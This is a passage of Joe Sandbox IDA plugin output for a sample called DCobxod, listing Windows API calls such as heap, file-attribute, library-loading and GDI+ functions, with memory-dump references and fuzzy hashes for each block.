                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00451098,004117CE,?,?,00000007,?,?,?,004113D6,?,00000000), ref: 00438EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 68eee254a734b21749f1ccf2a9d3cc3c1d4fe210ce9f2def9dae0d15acecae8f
                                                              • Instruction ID: 5177102df88313576552e50e8c488534e93a7df9053c42f484f6663e8dceb646
                                                              • Opcode Fuzzy Hash: 68eee254a734b21749f1ccf2a9d3cc3c1d4fe210ce9f2def9dae0d15acecae8f
                                                              • Instruction Fuzzy Hash: 44F0C23260131566DB212A769C06B6FF7589F99F70F24212FF818E6291DFACCD0181AD
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 004210AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 004210B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: b07f844f202e6be3c7cd2d8643e8b398a969ffde903f062c09eaa99c80ecc0e2
                                                              • Instruction ID: 7431cf735148ea46bfc0835a56e43e221c68e0a78bf4d5721db6174ba0138af1
                                                              • Opcode Fuzzy Hash: b07f844f202e6be3c7cd2d8643e8b398a969ffde903f062c09eaa99c80ecc0e2
                                                              • Instruction Fuzzy Hash: 3EE0D836B01195A7CF0D8BB5AC059EF73EDEA552057104176E403D3611F938DE414664
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A501
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 900141173a838c98c18c8c153e3a56a92ffa3525611977cf0a4a1ee6f583b40e
                                                              • Instruction ID: 1c853c31ef6476658b41f0a0fb84b51286cff034f0494a40335ef7762f34d619
                                                              • Opcode Fuzzy Hash: 900141173a838c98c18c8c153e3a56a92ffa3525611977cf0a4a1ee6f583b40e
                                                              • Instruction Fuzzy Hash: 8AF0E5312001097BDF019F61DC41FDA376DAF05785F848462B844D5160DB35DAD8DB54
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641,000000FF), ref: 0041A1F1
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641), ref: 0041A21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: f2b06597bd55c813d58261c3c3b2cb01e055d8a629263d71fa24b76dd7abfbad
                                                              • Instruction ID: 7fa3964a28bfe5af9f8d53b38b7fa8de10af1991e9c92ae43f11e9e0da28a955
                                                              • Opcode Fuzzy Hash: f2b06597bd55c813d58261c3c3b2cb01e055d8a629263d71fa24b76dd7abfbad
                                                              • Instruction Fuzzy Hash: 1EE068352002086BDB009F61DC41FDA336CAF0C7CAF480073B804D2150EB35DED4DA58
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00442641,000000FF), ref: 0042ACB0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00442641,000000FF), ref: 0042ACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: e4b53a87c82748637ebd0d022a79dd43452c8fa0ace4a4410546e46bbc380f2e
                                                              • Instruction ID: f0915dc0d0ff6b966f753a414159495a0d3e9edda2933c6d9e2a2fe1be43ae8d
                                                              • Opcode Fuzzy Hash: e4b53a87c82748637ebd0d022a79dd43452c8fa0ace4a4410546e46bbc380f2e
                                                              • Instruction Fuzzy Hash: D5E06572604650EFC700DF59DC06B45FBACFB49B20F50426AF416D3760CB74A840CA98
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0041A23A,?,0041755C,?,?,?,?), ref: 0041A254
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0041A23A,?,0041755C,?,?,?,?), ref: 0041A280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 8ea3cc56c4c53a048738d4b4d5709ca2c353cf2ed649050feeb407755ac057a0
                                                              • Instruction ID: 856adbc3c85fae65b3b0752ee6e4450371e273172e2831262f30d9453aa7870d
                                                              • Opcode Fuzzy Hash: 8ea3cc56c4c53a048738d4b4d5709ca2c353cf2ed649050feeb407755ac057a0
                                                              • Instruction Fuzzy Hash: E8E092355001245BCB11EB65DC05BDA77A8AB097E6F0442B2FD44E3294D774DE84CAE9
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0042DEEC
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0042DF03
                                                                • Part of subcall function 0042B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                                • Part of subcall function 0042B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                                • Part of subcall function 0042B568: IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                                • Part of subcall function 0042B568: TranslateMessage.USER32(?), ref: 0042B5AC
                                                                • Part of subcall function 0042B568: DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 878ab55ebdc2a26c0cbd6441f9336b4b401f76da6aab637815c9076f50dccec5
                                                              • Instruction ID: 0435dda40d1ed7cee5554f6c5642076449c971ca5b614545909626c56e1af989
                                                              • Opcode Fuzzy Hash: 878ab55ebdc2a26c0cbd6441f9336b4b401f76da6aab637815c9076f50dccec5
                                                              • Instruction Fuzzy Hash: F8E09B7550035826DF01AB63DC06FDE3B6C9B057CAF84046AB644EA0A3EA7DE6508769
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: 633cb2cc96e0a156b1ab48c2b27f8dd9aab2eb89fc73d9339f634bcf4622a139
                                                              • Instruction ID: d9f036043dc8f18d541bca6d475b9a1941918cab57638081b5700680750f1edc
                                                              • Opcode Fuzzy Hash: 633cb2cc96e0a156b1ab48c2b27f8dd9aab2eb89fc73d9339f634bcf4622a139
                                                              • Instruction Fuzzy Hash: 4FE012765001286ADB11AB95AC45FDB7BACEF097D2F44006A7645E2104DA78DA848AA4
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0042A3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0042A3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: 5e5a785e2db3fcffec38c64331236a0acb44a3f18e9a1e3772cea743dd3cf3fd
                                                              • Instruction ID: d59f9176ee3027dcc3ecaa94946aa05b4771cc0ad378c7d0f54509a559e354fb
                                                              • Opcode Fuzzy Hash: 5e5a785e2db3fcffec38c64331236a0acb44a3f18e9a1e3772cea743dd3cf3fd
                                                              • Instruction Fuzzy Hash: 65E0ED71600228EBDB10DF56D541799BBE8EF05364F50C05BA84697201E778AE04DB95
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00432BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00432BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: b52a5eef7afb466f31c092721e3650c0cb2d579f96358660bba70bdde74ed462
                                                              • Instruction ID: ce53a6cf4108b82671a4e2abc1ab6495659b20e65952ebe05e0afb2eda0c55f1
                                                              • Opcode Fuzzy Hash: b52a5eef7afb466f31c092721e3650c0cb2d579f96358660bba70bdde74ed462
                                                              • Instruction Fuzzy Hash: E8D0A939154200285C142FB23B02A8AB345AD4AB7AFB0729FF020955C1EADCA240A02E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: 61a0f356e726448f03dbed2c39ead234584b38aceed739c192b385c2ce52baeb
                                                              • Instruction ID: bcec707ea75a74b659d51eb4f71fa03bef3d5cd0fd06c423312dd4f5320d725b
                                                              • Opcode Fuzzy Hash: 61a0f356e726448f03dbed2c39ead234584b38aceed739c192b385c2ce52baeb
                                                              • Instruction Fuzzy Hash: C8C0123205C200FECB010FB4DC09C2BBBA8EBA5312F04C928B0A9C0060CA38C950EB12
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 271e08ab283a3871d50f25893a1392429e074cbad7bda63f1247ad315bd8b450
                                                              • Instruction ID: 4566d98a5810687098b11931d7a52a202ab00a9d0a4c78dd29cfe091adbc06b8
                                                              • Opcode Fuzzy Hash: 271e08ab283a3871d50f25893a1392429e074cbad7bda63f1247ad315bd8b450
                                                              • Instruction Fuzzy Hash: DBC1C830A042549FEF15CF68C484BEA7BA5AF05314F0801BFDE459B3A6DB38A9C5CB65
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: b6b0162671b15d0fcf6e368d39912ce18c732cde97ba11a1f272586adf1460c7
                                                              • Instruction ID: 47a553370f61f9d316cd2e3c7d9b1d5486c6bf68c50e1213a806787fc70a9d29
                                                              • Opcode Fuzzy Hash: b6b0162671b15d0fcf6e368d39912ce18c732cde97ba11a1f272586adf1460c7
                                                              • Instruction Fuzzy Hash: FA71D271540B449EDB25DF70C851AE7B7E9AF14306F40092FE6AB83241EA3A66C8CF19
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00418289
                                                                • Part of subcall function 004113DC: __EH_prolog.LIBCMT ref: 004113E1
                                                                • Part of subcall function 0041A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0041A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: 3eba618578570e8d5ec7737e5a29d57486fa3509f3e103c50c9ff8775b641d4a
                                                              • Instruction ID: c453eb66958cd21cd4a428d84d4746891cde8563911ecb2b19bf79012fa932f0
                                                              • Opcode Fuzzy Hash: 3eba618578570e8d5ec7737e5a29d57486fa3509f3e103c50c9ff8775b641d4a
                                                              • Instruction Fuzzy Hash: 7B412B319442189ADB20DBA1CC51BEAB3B8AF00304F4400EFE54A93193EF796FC5CB14
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004113E1
                                                                • Part of subcall function 00415E37: __EH_prolog.LIBCMT ref: 00415E3C
                                                                • Part of subcall function 0041CE40: __EH_prolog.LIBCMT ref: 0041CE45
                                                                • Part of subcall function 0041B505: __EH_prolog.LIBCMT ref: 0041B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 2c4b9cac537fe856674e0f8796907fb6dc27828e745cee0aafc2a61085be703b
                                                              • Instruction ID: bb92f64d867c29facab0b43ea55b9089c7ce1e6689e61af721e479906e2a9046
                                                              • Opcode Fuzzy Hash: 2c4b9cac537fe856674e0f8796907fb6dc27828e745cee0aafc2a61085be703b
                                                              • Instruction Fuzzy Hash: F5414BB0905B409EE724CF7A8885AE6FBE5BF18304F90492FD5EE83282C7756654CB18
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004113E1
                                                                • Part of subcall function 00415E37: __EH_prolog.LIBCMT ref: 00415E3C
                                                                • Part of subcall function 0041CE40: __EH_prolog.LIBCMT ref: 0041CE45
                                                                • Part of subcall function 0041B505: __EH_prolog.LIBCMT ref: 0041B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 8dd20683b7b733e9557ed9be83d2cb1aec0ebe5dff59568cf014cc4affef3a83
                                                              • Instruction ID: 3c5e73c7e297bb15fafe8f64cdac25479b45135fee51678dc52d3fac2f587a26
                                                              • Opcode Fuzzy Hash: 8dd20683b7b733e9557ed9be83d2cb1aec0ebe5dff59568cf014cc4affef3a83
                                                              • Instruction Fuzzy Hash: EA4139B0905B409AE724DF7A8885AE6FBE5BF18304F90492FD5EE83282CB756654CB14
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042B098
                                                                • Part of subcall function 004113DC: __EH_prolog.LIBCMT ref: 004113E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 307b0858129503666c83e0b653f6f2d9e53d1de27d77c818634dfcc4a2765894
                                                              • Instruction ID: 1eaa3894549be216c8ced1c54951ce42e1963fe1f901eb464d44253fa4e68211
                                                              • Opcode Fuzzy Hash: 307b0858129503666c83e0b653f6f2d9e53d1de27d77c818634dfcc4a2765894
                                                              • Instruction Fuzzy Hash: 0C318D71D002599EDF15DF66D851AFEBBB4AF08308F50449FE409B3252D739AE04CBA9
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,00443A34), ref: 0043ACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
